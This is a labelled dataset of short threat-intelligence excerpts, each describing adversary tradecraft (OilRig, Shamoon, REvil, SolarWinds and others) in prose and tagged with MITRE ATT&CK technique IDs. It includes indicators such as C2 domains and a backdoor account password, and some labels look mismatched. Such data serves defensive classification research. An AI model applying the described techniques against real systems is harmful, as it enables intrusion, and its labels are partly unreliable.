{"text1":"Based on the use of the relatively unique PLAINTEE malware, the malware\u2019s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document. By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious\u2019 codes small footprint can help enable evasion of automated detection mechanisms based on macro content","labels":"['T1204.002']"}
{"text1":"The QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails","labels":"['T1059.003']"}
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1","labels":"['T1059.003']"}
{"text1":"1) The printer vulnerability MS10-061 exploited by Stuxnet \u2013 using a special MOF file, executed on the attacked system using WMI","labels":"['T1136.001']"}
{"text1":"Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets\u2019 networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named \u201csysvolinfo.exe\u201d. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork\u2019s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files","labels":"['T1566.002']"}
{"text1":"The configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory. The file name is hardcoded and obfuscated with XOR. The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added","labels":"['T1070.004']"}
{"text1":"After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection","labels":"['T1070.005']"}
{"text1":"Targets common cloud applications such as web servers for initial access, using known vulnerabilities (\u201c1-days\u201d) \u2013 presumably those with a working exploit in the wild. Uses Windows container escape techniques to escape the container and gain code execution on the underlying node. Connects to its C2 server using the IRC protocol over the Tor network","labels":"['T1190']"}
{"text1":"Intelligence gathering and stealing information has generally been the motivation behind Cicada\u2019s attacks in the past, and that would appear to be the case in this attack campaign too. We observed the attackers archiving some folders of interest in these attacks, including in one organization folders relating to human resources (HR), audit and expense data, and meeting memos","labels":"['T1083']"}
{"text1":"The actors behind this campaign gained access to numerous public and private organizations around the world. They gained access to victims via trojanized updates to SolarWind\u2019s Orion IT monitoring and management software","labels":"['T1195.002']"}
{"text1":"The macros are also responsible for achieving reboot persistence for the ObliqueRAT payloads. This is done by creating a shortcut (.url file extension) in the infected user's Startup directory. Malicious shortcut in the infected user's startup directory to execute ObliqueRAT on startup","labels":"['T1547.001']"}
{"text1":"Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10","labels":"['T1036.004']"}
{"text1":"It will then resolve the current process\u2019s PID and path to be used as script arguments, and proceeds to execute the script by running: \/bin\/sh -c .\/update.sh <process_id> <process_path","labels":"['T1083']"}
{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information","labels":"['T1027']"}
{"text1":"The \u2018jli.dll\u2019 file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature","labels":"['T1574.002']"}
{"text1":"Siloscape searches for kubectl.exe by name and the config file using a regular expression. The search function takes an extra argument: a pointer to a vector that holds folder names to exclude from the search","labels":"['T1083']"}
{"text1":"We believe the malware authors chose to send packets that look like legitimate DNS requests over UDP port 53 to avoid being blocked by firewalls. It is very common to whitelist DNS requests in firewall configurations because blocking them could disrupt name resolution","labels":"['T1071.004']"}
{"text1":"At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations","labels":"['T1036.005']"}
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1490']"}
{"text1":"Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin\u2019s configured list. In this particular instance, the malware will seek out the following file types","labels":"['T1119']"}
{"text1":"The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system","labels":"['T1059.003']"}
{"text1":"Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information","labels":"['T1082']"}
{"text1":"The image displayed to the user after mounting the DMG appears to be the \u201cInstall\u201d file. In actuality, it is just a system link that points to the 1302.app application bundle, or the malicious application itself. By double-clicking the \u201cInstall\u201d image in Figure C, the system actually executes the 1302.app, where 1302.app\/Contents\/MacOS\/1302 is just a bash script","labels":"['T1553.001']"}
{"text1":"netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks","labels":"['T1200']"}
{"text1":"The malware has the ability to regularly take screenshots; what\u2019s more, it takes screenshots when certain \u201cinteresting\u201d applications are run, for instance, IM\u2019s. Screenshots are stored in compressed format and are regularly sent to the C&C server \u2013 just like the audio recordings","labels":"['T1113']"}
{"text1":"To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge","labels":"['T1057', 'T1555.003']"}
{"text1":"The information collected is performed using WMI queries: Additionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data","labels":"['T1057']"}
{"text1":"This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template","labels":"['T1059.005']"}
{"text1":"The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers","labels":"['T1071.001']"}
{"text1":"1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign","labels":"['T1140']"}
{"text1":"The group has made significant improvements to their arsenal recently and has both developed new tools and modified existing ones. The key observations covered below are based on CrowdStrike\u00ae Intelligence analysis of BazarLoader, Conti and Ryuk operations","labels":"['T1486']"}
{"text1":"After the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it deletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check of what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". For this, the following HTTP request is used which contains also data from the victim as well the JPEG files","labels":"['T1074.001']"}
{"text1":"The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack","labels":"['T1489']"}
{"text1":"The script hides under multiple layers of encryption, obfuscation, and encoding techniques. For this sample, we were able to reveal three layers of code. The top-most layer executes a base64-encoded command","labels":"['T1027']"}
{"text1":"CrowdStrike also identified a connection between StellarParticle-related campaigns and the abuse of Microsoft Cloud Solution Partners\u2019 O365 tenants. This threat actor abused access to accounts in the Cloud Solution Partner\u2019s environment with legitimate delegated administrative privileges to then gain access to several customers\u2019 O365 environments","labels":"['T1199']"}
{"text1":"Malware used by the threat group can be configured to bypass network-based detection; however, the threat actors rarely modify host-based configuration settings when deploying payloads. The threat actors demonstrated the ability to adapt when reentering a network after an eviction, overcoming technical barriers constructed by network defenders","labels":"['T1056.001']"}
{"text1":"In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account","labels":"['T1560.001', 'T1567.002']"}
{"text1":"TA505 sent several similar campaigns in mid-October with VBScript compressed in 7-Zip files that also downloaded either Locky or The Trick. By late October, the actor switched to Microsoft Word attachments that abused Dynamic Data Exchange (DDE) to download either Locky or Locky and The Trick in several more geo-targeted campaigns. This was the first time that we observed TA505 abusing DDE, a legitimate feature in Microsoft Office that became a regular part of multiple threat actors\u2019 toolkits in Q4 2017. Recipients of these emails, which also used simple lures with attached fake invoices, needed to open the Microsoft Word attachments and click through a security dialog (Figure 3) to download the malware","labels":"['T1204.001']"}
{"text1":"WannaCry then proceeds to encrypt files on the system, searching for the following file extensions, which are hard-coded in the binary","labels":"['T1083']"}
{"text1":"The document is disguised from the Colombian National Civil Registry and uses Spanish to prompt the victim to enable the macro code in order to execute the subsequent payload","labels":"['T1204.002']"}
{"text1":"In addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network","labels":"['T1133']"}
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information","labels":"['T1057']"}
{"text1":"Next, the script executes a command to delete the targeted PC\u2019s volume shadow copies, so victims cannot restore older unencrypted versions of their files","labels":"['T1490']"}
{"text1":"No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr","labels":"['T1210']"}
{"text1":"We identified that even though the downloaded installation executable was signed using a valid digital signature issued to Piriform, CCleaner was not the only application that came with the download. During the installation of CCleaner 5.33, the 32-bit CCleaner binary that was included also contained a malicious payload that featured a Domain Generation Algorithm (DGA) as well as hardcoded Command and Control (C2) functionality. We confirmed that this malicious version of CCleaner was being hosted directly on CCleaner's download server as recently as September 11, 2017. In reviewing the Version History page on the CCleaner download site, it appears that the affected version (5.33) was released on August 15, 2017. On September 12, 2017 version 5.34 was released. The version containing the malicious payload (5.33) was being distributed between these dates. This version was signed using a valid certificate that was issued to Piriform Ltd by Symantec and is valid through 10\/10\/2018. Piriform was the company that Avast recently acquired and was the original company who developed the CCleaner software application. This second sample was also signed using a valid digital certificate, however the signing timestamp was approximately 15 minutes after the initial sample was signed. It is also important to note that while previous versions of the CCleaner installer are currently still available on the download server, the version containing the malicious payloads has been removed and is no longer available","labels":"['T1195.002']"}
{"text1":"Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection","labels":"['T1071.001']"}
{"text1":"A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain\u2019s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account","labels":"['T1134.005']"}
{"text1":"The presence of this credential stealer may partially answer how Kobalos propagates. Anyone using the SSH client of a compromised machine will have their credentials captured. Those credentials can then be used by the attackers to install Kobalos on the newly discovered server later","labels":"['T1056']"}
{"text1":"Extracting and dropping an OpenSSH binary from its PE resources - Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources - Creating a new user \u201csupportaccount\u201d with a password of \u201cGhar4f5\u201d - Adding this user to the \u201cRemote Desktop Users\u201d and \u201cAdministrators\u201d groups","labels":"['T1136.001']"}
{"text1":"Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1003']"}
{"text1":"1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template","labels":"['T1221']"}
{"text1":"As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person","labels":"['T1087.003', 'T1087.002']"}
{"text1":"As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle\u2019s Resources folder. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~\/Library\/LaunchAgents\/com.aex-loop.agent.plist","labels":"['T1564.001']"}
{"text1":"First, the malware goes over the files and directories from the paths_to_wipe config, fills them with zero-bytes instead of their real content, and then deletes them","labels":"['T1485']"}
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information. The tool runs the following list of WMI queries","labels":"['T1047']"}
{"text1":"To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute","labels":"['T1490']"}
{"text1":"Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates. In December 2019, GOLD SOUTHFIELD began operating a name-and-shame style website that uses stolen data from intrusions to generate additional leverage against victims; a tactic known as double extortion. Despite GOLD SOUTHFIELD's infrastructure being taken down by law enforcement in October 2021, the REvil leak site re-emerged in April 2022 with several new victims added. GOLD SOUTHFIELD also began recruiting exclusively via their leak site using the peer-to-peer secure messaging software Tox Chat. GOLD SOUTHFIELD's affiliates distribute ransomware through a variety of means including exploit kits, scan-and-exploit attacks, publicly-accessible RDP, remote management and monitoring (RMM) servers, and backdoored software installers. As of May 2022, the group continues to operate REvil as a name-and-shame scheme and uses a leak site to post victim information and recruit affiliates","labels":"['T1195.002']"}
{"text1":"After all this, if the malware successfully discovers a viable target and is able to gain access through SSH credential brute forcing, the malware will be able to begin installation of the cryptocurrency miner. Linux Rabbit attempts to install both \u201cCNRig\u201d and \u201cCoinHive\u201d Monero miners onto the machine, but only one will actually successfully install depending on what type of architecture the machine is. If the machine is a x86-bit, it will install CNRig Monero miner and if the machine is an ARM\/MISP, it will install CoinHive. If the infected machine is a web server, the malware will inject CoinHive script tags into every HTML file, so that even visitors of the site\/server are also infected with the cryptocurrency miner. Linux Rabbit is able to connect to GitHub and receive updates from the threat actors. It also has a killswitch built-in. It is able to detect other miners already on a target machine and delete them from the machine during the installation of its own miner","labels":"['T1110.003']"}
{"text1":"Next, a Cobalt Strike binary was dropped on the endpoint as a .dll file and executed by rundll32.exe. With that, the intrusion began spreading laterally via Cobalt Strike. The operators used Windows Management Instrumentation (WMI) in their lateral movement attempt. WMI spawned cmd.exe, which subsequently spawned PowerShell with an encoded command line. This encoded PowerShell creates another Cobalt Strike Beacon. We\u2019ve found that looking for encoded PowerShell is a great way to catch this specific evil and a lot of other evil, too. In this incident, we saw a command line that began with","labels":"['T1059.001']"}
{"text1":"Multiple SUNBURST samples have been recovered, delivering different payloads. In at least one instance the attackers deployed a previously unseen memory-only dropper we\u2019ve dubbed TEARDROP to deploy Cobalt Strike BEACON","labels":"['T1105']"}
{"text1":"The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF\/WebP file header magic\/fields) and encoding the resulting WebP file","labels":"['T1036']"}
{"text1":"How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick","labels":"['T1480.001']"}
{"text1":"The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools","labels":"['T1027']"}
{"text1":"When run, the first thing the script does is to retrieve a GUID associated to a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\\Microsoft\\Homenet\\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It\u2019s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e. a real machine with LAN connections available","labels":"['T1049']"}
{"text1":"In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive","labels":"['T1119', 'T1005']"}
{"text1":"The actors have regularly\u00a0leveraged Cobalt Strike\u00a0BEACON\u00a0and Metasploit Meterpreter to move laterally within victim environments. The actors commonly moved\u00a0laterally within victim environments\u00a0using compromised accounts\u2014both those belonging to regular users and accounts with administrative privileges. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors used the Windows\u00a0net use\u00a0command to connect to Windows admin shares to move laterally","labels":"['T1078.002']"}
{"text1":"Whitefly usually attempts to remain within a targeted organization for long periods of time\u2014often months\u2014in order to steal large volumes of information. It keeps the compromise alive by deploying a number of tools that facilitate communication between the attackers and infected computers","labels":"['T1059']"}
{"text1":"The binary will be saved in the %APPDATA% folder and, for persistence, it creates a scheduled task that will execute every hour","labels":"['T1053.005']"}
{"text1":"By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization\u2019s corporate and restricted segments","labels":"['T1090.001']"}
{"text1":"USB Worm -> this is the USBWorm component developed for stealing files from removable drives, spread across systems by infecting removable media, and download and execute the \u201cThin Client\u201d component from a remote Crimson server","labels":"['T1091']"}
{"text1":"GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user. GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]\u2019s S4USelf + User to User Kerberos Authentication. GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property \u2018Do not require Kerberos preauthentication\u2019 set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. ticketConverter.py: This script will convert\u00a0kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids","labels":"['T1558.003']"}
{"text1":"Creates events \"__klg__\" and \"__klgkillsoft__\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count","labels":"['T1547.001']"}
{"text1":"The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable","labels":"['T1140']"}
{"text1":"Another component used by this group is a variant of TerraTV. It runs a legitimate TeamViewer application but hides its user interface elements, so that the operators of the malware can connect to the compromised computer undetected","labels":"['T1219']"}
{"text1":"It creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it. Thereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With this information, it creates the following string used by a subsequent send() function call","labels":"['T1082']"}
{"text1":"This is the final payload that has been deployed as a service using svchost.exe. This Rat is heavily obfuscated and is using multiple anti-analysis techniques. It has a custom section named \u201cqwdfr0\u201d which performs all the de-obfuscation process. This payload register itself as a service using its export function ServiceMain","labels":"['T1543.003']"}
{"text1":"In previous attacks, we were able to determine the impacted organization based on the domain names and credentials used by the Disttrack tool to spread to other systems on the network. However, that functionality was missing from this sample. Unlike past Shamoon attacks, this particular Disttrack wiper would not overwrite files with an image. Instead it would overwrite the MBR, partitions, and files on the system with randomly generated data","labels":"['T1485']"}
{"text1":"Since 2014, Inception has widened its use of cloud service providers for C&C purposes. Whereas previously it relied on one service provider (CloudMe.com), more recently it has employed a least five cloud service providers","labels":"['T1102']"}
{"text1":"The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1566.001']"}
{"text1":"Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information","labels":"['T1047']"}
{"text1":"After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received\/transmitted one by one or in multiple packets in a single TCP data segment (streamed","labels":"['T1572']"}
{"text1":"The core component will check whether it is located in the %temp%\\[appname] directory, otherwise it copies itself to %temp%\\[appname]\\[appname] and set the file attribute to hidden","labels":"['T1083']"}
{"text1":"First, the malware checks for the existence of a Mutex value, \u201cEKANS\u201d, on the victim. If present, the ransomware will stop with a message \u201calready encrypted. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim","labels":"['T1486']"}
{"text1":"Function and variable names are obfuscated. Strings are encrypted. Contain an encrypted .NET injector and one or more encrypted PE payloads. Take one argument that is the decryption key for the embedded .NET injector and PE payload(s). - Embedded .NET injector and payload(s) are encoded with Base64 and encrypted with Rijndael","labels":"['T1027']"}
{"text1":"All of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out some action. The payload in a majority of these attacks was a backdoor called Spark, which is a backdoor that allows the threat actors to open applications and run command line commands on the compromised system","labels":"['T1204.001', 'T1204.002']"}
{"text1":"We can also see files created in a TEMP folder that are serving as a small database, where Dyreza stores information, before they are sent to the C&C","labels":"['T1074.001']"}
{"text1":"Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\<Redacted Username>\\Desktop\\OWAExchange","labels":"['T1059.006']"}
{"text1":"To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute. The length and uniqueness of this command allow for the development of high-fidelity detection controls","labels":"['T1059.003']"}
{"text1":"an \u201cobject_id\u201d that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware - a list of processes into which code is injected (iproc) - the frequency and time for task execution \/ backup logs \/ connection to the C&C ([TIME]) - the IP addresses of other computers on the network ([CW_LOCAL]) - the C&C server addresses ([CW_INET]) - the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT","labels":"['T1016']"}
{"text1":"Throughout our investigation, many of the analyzed ZeroT RAR SFX samples (e.g. 67693ddb6236d3ef790059409ae240212c47acfd8c1c76d65c3ef19096fdf43b) contained a file named Go.exe which performs Windows UAC bypass. This executable contains a PDB path indicating its purpose of bypassing UAC (Fig","labels":"['T1548.002']"}
{"text1":"The \u2018microsoft-cache\u2019 domain was used by the malware variant that communicated over HTTP. We found four unique samples communicating with this domain, which resolved to the same Hong Kong-based IP address used by the first two domains","labels":"['T1016']"}
{"text1":"When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","labels":"['T1055.012']"}
{"text1":"These encrypted blobs are dropped to C:\\Users\\user\\AppData\\Local\\Temp\\3f34a.tmp one after the other. Once they are dropped, the dropper also decrypts them and writes them to a newly created folder and creates persistence","labels":"['T1140']"}
{"text1":"It iterates over all possible Office <version> values for both Word and Excel <product> values. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The malware moves each located document into the AppData folder, inserts malicious Word or Excel macros into it using a Microsoft.Office.Interop object, and then moves the document back into its original folder. In the samples we analyzed, the injected macros were simple downloaders","labels":"['T1080']"}
